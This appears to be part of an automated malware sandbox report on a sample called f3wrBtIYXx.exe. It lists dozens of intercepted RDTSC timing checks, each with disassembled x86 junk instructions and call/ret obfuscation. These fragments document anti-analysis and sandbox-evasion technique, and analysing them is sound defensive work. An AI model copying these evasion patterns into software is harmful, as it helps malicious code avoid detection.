Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6638 second address: 8B664F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F5F64D1DF1Ch 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B68F7 second address: 8B6906 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jl 00007F5F64D1DAB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6906 second address: 8B690C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B690C second address: 8B6911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6911 second address: 8B6925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DF1Eh 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6925 second address: 8B6945 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6A76 second address: 8B6A80 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5F64D1DF16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6BC2 second address: 8B6BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F5F64D1DAB6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6BD1 second address: 8B6BD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6BD7 second address: 8B6BE8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jno 00007F5F64D1DAB6h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6BE8 second address: 8B6BFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F5F64D1DF16h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6D89 second address: 8B6D93 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5F64D1DAB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6D93 second address: 8B6D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6D99 second address: 8B6D9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6D9E second address: 8B6DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BA94D second address: 8BA968 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BA9BE second address: 8BAA32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007F5F64D1DF1Ch 0x0000000f popad 0x00000010 push eax 0x00000011 push esi 0x00000012 jno 00007F5F64D1DF1Ch 0x00000018 pop esi 0x00000019 nop 0x0000001a jmp 00007F5F64D1DF22h 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push esi 0x00000024 call 00007F5F64D1DF18h 0x00000029 pop esi 0x0000002a mov dword ptr [esp+04h], esi 0x0000002e add dword ptr [esp+04h], 00000014h 0x00000036 inc esi 0x00000037 push esi 0x00000038 ret 0x00000039 pop esi 0x0000003a ret 0x0000003b push 6F6E097Eh 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 js 00007F5F64D1DF16h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BAA32 second address: 8BAA38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BAA38 second address: 8BAABB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5F64D1DF18h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 6F6E09FEh 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F5F64D1DF18h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D19C8h], ebx 0x00000031 push 00000003h 0x00000033 sbb dx, 77D6h 0x00000038 push 00000000h 0x0000003a mov esi, 01B97300h 0x0000003f mov ecx, dword ptr [ebp+122D2ACFh] 0x00000045 push 00000003h 0x00000047 mov esi, dword ptr [ebp+122D2A6Bh] 0x0000004d call 00007F5F64D1DF19h 0x00000052 push esi 0x00000053 jmp 00007F5F64D1DF28h 0x00000058 pop esi 0x00000059 push eax 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d push ebx 0x0000005e pop ebx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BAE1D second address: 8BAE23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BAE23 second address: 8BAE95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c call 00007F5F64D1DF23h 0x00000011 mov dword ptr [ebp+122D19A2h], esi 0x00000017 pop edx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007F5F64D1DF18h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 mov dword ptr [ebp+122D37D7h], esi 0x0000003a call 00007F5F64D1DF19h 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 jmp 00007F5F64D1DF22h 0x00000047 pop eax 0x00000048 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BAE95 second address: 8BAEAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DAC1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BAEAA second address: 8BAEBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F5F64D1DF18h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BAEBD second address: 8BAEC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BAEC3 second address: 8BAEC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BAEC7 second address: 8BAED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8CC5F7 second address: 8CC601 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5F64D1DF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8CC601 second address: 8CC607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8CC607 second address: 8CC60B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8DA394 second address: 8DA3A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D83E4 second address: 8D83E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D83E9 second address: 8D8431 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5F64D1DAD2h 0x00000008 jmp 00007F5F64D1DAC6h 0x0000000d jns 00007F5F64D1DAB6h 0x00000013 push eax 0x00000014 push edx 0x00000015 pop edx 0x00000016 jg 00007F5F64D1DAB6h 0x0000001c pop eax 0x0000001d pop edx 0x0000001e pop eax 0x0000001f pushad 0x00000020 jmp 00007F5F64D1DAC4h 0x00000025 push esi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D86AA second address: 8D86AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D86AE second address: 8D86BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D86BC second address: 8D86E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5F64D1DF16h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 je 00007F5F64D1DF16h 0x00000016 jmp 00007F5F64D1DF1Dh 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D86E0 second address: 8D86F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F5F64D1DABEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D86F4 second address: 8D86F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D86F8 second address: 8D8702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D8702 second address: 8D8706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D883B second address: 8D8848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F5F64D1DAB8h 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D8848 second address: 8D885B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007F5F64D1DF16h 0x0000000b jnl 00007F5F64D1DF16h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D885B second address: 8D8874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 jmp 00007F5F64D1DABEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D8874 second address: 8D887C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D887C second address: 8D8882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D8CE2 second address: 8D8CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D9ACC second address: 8D9ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5F64D1DABFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D9ADF second address: 8D9AE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8DA1DC second address: 8DA1E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8DDA54 second address: 8DDA59 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 89E299 second address: 89E2D4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5F64D1DABEh 0x00000008 jmp 00007F5F64D1DAC3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jg 00007F5F64D1DABCh 0x00000016 pushad 0x00000017 ja 00007F5F64D1DAB6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8DFD86 second address: 8DFDA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5F64D1DF24h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8DEE87 second address: 8DEE91 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5F64D1DABCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8DFFFE second address: 8E0022 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5F64D1DF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5F64D1DF26h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E0022 second address: 8E0078 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DABEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F5F64D1DAC3h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push ebx 0x00000015 jnl 00007F5F64D1DABCh 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F5F64D1DAC7h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E5E38 second address: 8E5E43 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jns 00007F5F64D1DF16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E63B8 second address: 8E63BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E88D7 second address: 8E88DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E88DC second address: 8E88E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F5F64D1DAB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E88E6 second address: 8E890F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5F64D1DF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 172FBC6Eh 0x00000013 jnl 00007F5F64D1DF1Ch 0x00000019 push BE287C2Ch 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pop edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E890F second address: 8E8926 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5F64D1DAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5F64D1DABBh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E8A0B second address: 8E8A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E8A11 second address: 8E8A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E94C6 second address: 8E94CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E94CC second address: 8E94FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F5F64D1DABFh 0x0000000e xchg eax, ebx 0x0000000f movzx edi, dx 0x00000012 nop 0x00000013 pushad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push ebx 0x0000001b push edx 0x0000001c pop edx 0x0000001d pop ebx 0x0000001e popad 0x0000001f push eax 0x00000020 pushad 0x00000021 push edi 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E94FA second address: 8E9503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E9503 second address: 8E9507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E95DD second address: 8E95EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E9FD0 second address: 8E9FE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E9FE7 second address: 8EA005 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F5F64D1DF16h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8EBAC2 second address: 8EBACF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8EB32B second address: 8EB33E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8EB33E second address: 8EB349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F5F64D1DAB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8ECD18 second address: 8ECD1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8EF1B2 second address: 8EF1C0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5F64D1DAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8EF1C0 second address: 8EF1E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F5F64D1DF2Eh 0x00000010 jmp 00007F5F64D1DF28h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F1E8F second address: 8F1E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F1E94 second address: 8F1EB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jl 00007F5F64D1DF18h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007F5F64D1DF16h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F1EB5 second address: 8F1F1F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F5F64D1DAB8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 mov dword ptr [ebp+1245ED66h], edi 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007F5F64D1DAB8h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 mov edi, esi 0x00000046 stc 0x00000047 push 00000000h 0x00000049 mov ebx, dword ptr [ebp+122D29EBh] 0x0000004f xchg eax, esi 0x00000050 push edi 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F1F1F second address: 8F1F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F1F23 second address: 8F1F27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F2DB9 second address: 8F2DBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
